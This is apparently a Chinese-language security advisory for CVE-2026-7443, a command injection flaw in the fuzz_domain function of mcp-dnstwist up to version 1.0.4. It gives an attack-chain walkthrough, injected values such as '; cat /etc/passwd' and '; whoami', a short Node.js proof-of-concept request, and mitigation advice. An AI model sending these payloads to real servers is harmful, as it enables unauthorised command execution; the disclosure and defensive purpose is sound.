CVE-2026-7443 mcp-dnstwist远程命令执行漏洞

漏洞信息

漏洞编号

CVE-2026-7443

漏洞类型

操作系统命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BurtTheCoder mcp-dnstwist

漏洞概述

CVE-2026-7443 是 BurtTheCoder 开发的 mcp-dnstwist 组件中发现的一个高危安全漏洞。该漏洞影响 1.0.4 及之前的所有版本。问题的根源在于组件的 MCP 接口中的 `src/index.ts` 文件，具体涉及 `fuzz_domain` 函数。由于该函数在处理传入的 `Request` 参数时缺乏足够的输入验证和安全过滤，攻击者可以通过恶意构造的数据包触发操作系统命令注入。攻击者无需进行身份认证即可通过网络发起远程攻击。一旦漏洞被成功利用，攻击者便能在底层操作系统上执行任意命令，这不仅可能导致敏感数据的泄露（低机密性影响），还可能破坏数据的完整性（低完整性影响）并导致服务拒绝（低可用性影响）。鉴于目前已有公开的利用代码且官方尚未修复，该漏洞对使用该组件的系统构成了严重的安全威胁。

技术细节

该漏洞的技术核心在于不安全的系统调用处理。在 mcp-dnstwist 组件的 TypeScript 实现中，`fuzz_domain` 函数旨在对域名进行变体生成和查询。然而，该函数直接将用户可控的 `Request` 参数拼接到了后续调用的系统命令中。在 Node.js/TypeScript 环境下，这通常涉及使用 `child_process.exec` 或类似的同步/异步执行函数，而不是使用更安全的 `spawn` 或 `execFile` 配合参数数组。当攻击者发送包含 Shell 元字符（如 `;`、`&`、`|`、`` ` `` 或 `$()`）的请求时，解析器会将这些字符解释为命令分隔符或指令替换符。例如，攻击者可以构造 `example.com; cat /etc/passwd` 作为输入。由于程序没有对输入进行清洗或转义，Web 后端会直接执行拼接后的命令。攻击向量为网络（AV:N），且无需用户交互（UI:N）和权限（PR:N），这使得自动化扫描和蠕虫式传播成为可能。攻击成功后，攻击者将获得应用程序运行用户的权限，进而通过权限提升手段进一步控制服务器。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在运行 BurtTheCoder mcp-dnstwist 组件，且版本在 1.0.4 或更低。

STEP 2

武器化

攻击者构造包含操作系统命令注入载荷的恶意数据，例如在域名参数中添加 `; id` 或 `; cat /etc/passwd`。

STEP 3

交付

攻击者通过网络向受影响的 `fuzz_domain` 接口发送包含恶意参数的 HTTP POST 请求。

STEP 4

利用

服务器接收请求，`fuzz_domain` 函数未经验证直接将参数传递给系统 Shell 执行，触发命令注入。

STEP 5

达成目标

恶意命令在服务器上执行，攻击者获取命令输出或进一步建立反向 Shell，从而控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept for CVE-2026-7443
// This script demonstrates how to exploit the OS command injection
// by sending a malicious payload to the 'fuzz_domain' function.

const axios = require('axios');

async function exploit(targetUrl) {
    // The vulnerable argument 'Request' is manipulated with command separators
    const payload = {
        "domain": "google.com; whoami; echo", // Malicious payload to inject OS command
        "method": "fuzz_domain"
    };

    try {
        console.log("[*] Sending malicious payload to target...");
        // Sending the request to the vulnerable endpoint
        const response = await axios.post(targetUrl, payload);
        console.log("[+] Response received from server:");
        console.log(response.data);
        // If successful, the output of 'whoami' should be visible in the response
    } catch (error) {
        console.error("[-] Exploit request failed:", error.message);
    }
}

// Replace with the actual target URL
// exploit('http://localhost:3000/api/fuzz');

影响范围

mcp-dnstwist <= 1.0.4

防御指南

临时缓解措施

鉴于官方尚未发布修复补丁，建议立即停止在公网环境使用受影响的 mcp-dnstwist 组件，或将其部署在隔离的沙箱容器中运行。同时，应在应用网关或反向代理层面（如 Nginx）配置严格的过滤规则，拦截包含分号、管道符等特殊字符的请求参数，以降低被攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7443
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7443
3 Details https://www.cvedetails.com/cve/CVE-2026-7443/
4 VulDB https://vuldb.com/cve/CVE-2026-7443
5 Link https://github.com/BruceJqs/public_exp/issues/22
6 Link https://github.com/BurtTheCoder/mcp-dnstwist/
7 Link https://github.com/BurtTheCoder/mcp-dnstwist/issues/13
8 Link https://vuldb.com/submit/804027
9 Link https://vuldb.com/vuln/360185
10 Link https://vuldb.com/vuln/360185/cti